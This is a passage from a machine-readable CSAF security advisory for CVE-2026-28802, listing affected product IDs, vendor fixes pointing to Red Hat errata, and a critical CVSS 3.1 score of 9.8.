not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.", "product_ids": [ "CSAFPID-5256659", "CSAFPID-5846430", "CSAFPID-5846431", "CSAFPID-5846432", "CSAFPID-5846433", "CSAFPID-5846434", "CSAFPID-5846435", "CSAFPID-5846436", "CSAFPID-5846437", "CSAFPID-5846438", "CSAFPID-5846439", "CSAFPID-5212154", "CSAFPID-5875331", "CSAFPID-5875332", "CSAFPID-5875333", "CSAFPID-5875334", "CSAFPID-5875335", "CSAFPID-5875336", "CSAFPID-5875337", "CSAFPID-5875338", "CSAFPID-5875339", "CSAFPID-5875340", "CSAFPID-5209636", "CSAFPID-5903532", "CSAFPID-5903533", "CSAFPID-5903534", "CSAFPID-5903535", "CSAFPID-5903536", "CSAFPID-5903537", "CSAFPID-5903538", "CSAFPID-5903539", "CSAFPID-5903540", "CSAFPID-5903541", "CSAFPID-5153949", "CSAFPID-5973065", "CSAFPID-5973066", "CSAFPID-5973067", "CSAFPID-5973068", "CSAFPID-5973069", "CSAFPID-5973070", "CSAFPID-5973071", "CSAFPID-5973072", "CSAFPID-5973073", "CSAFPID-5973074", "CSAFPID-5973075", "CSAFPID-5973076", "CSAFPID-5973077", "CSAFPID-5973078", "CSAFPID-5973079", "CSAFPID-5973080", "CSAFPID-5973081", "CSAFPID-5973082", "CSAFPID-5973083", "CSAFPID-5973084", "CSAFPID-5973085", "CSAFPID-5973086", "CSAFPID-5973087", "CSAFPID-5973088", "CSAFPID-5973089", "CSAFPID-5973090", "CSAFPID-5973091", "CSAFPID-5973092", "CSAFPID-5984227" ] }, { "category": "vendor_fix", "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "CSAFPID-5212154", "CSAFPID-5875331" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2026:5168" }, { "category": "vendor_fix", "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "CSAFPID-5209636", "CSAFPID-5903532" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2026:5665" }, { "category": "vendor_fix", "details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade", "product_ids": [ "CSAFPID-5153949", "CSAFPID-5973065" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2026:6309" }, { "category": "vendor_fix", "details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade", "product_ids": [ "CSAFPID-5153949", "CSAFPID-5973065" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2026:6404" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL" }, "products": [ "CSAFPID-1317174", "CSAFPID-1317175", "CSAFPID-1330296", "CSAFPID-1384077", "CSAFPID-1405218", "CSAFPID-1439313", "CSAFPID-1441200", "CSAFPID-1455906", "CSAFPID-1508257", "CSAFPID-5035448", "CSAFPID-5222639", "CSAFPID-5352550", "CSAFPID-5354794", "CSAFPID-5355695", "CSAFPID-5760072", "CSAFPID-5760073", "CSAFPID-5970754" ] } ], "title": "CVE-2026-28802" } ] }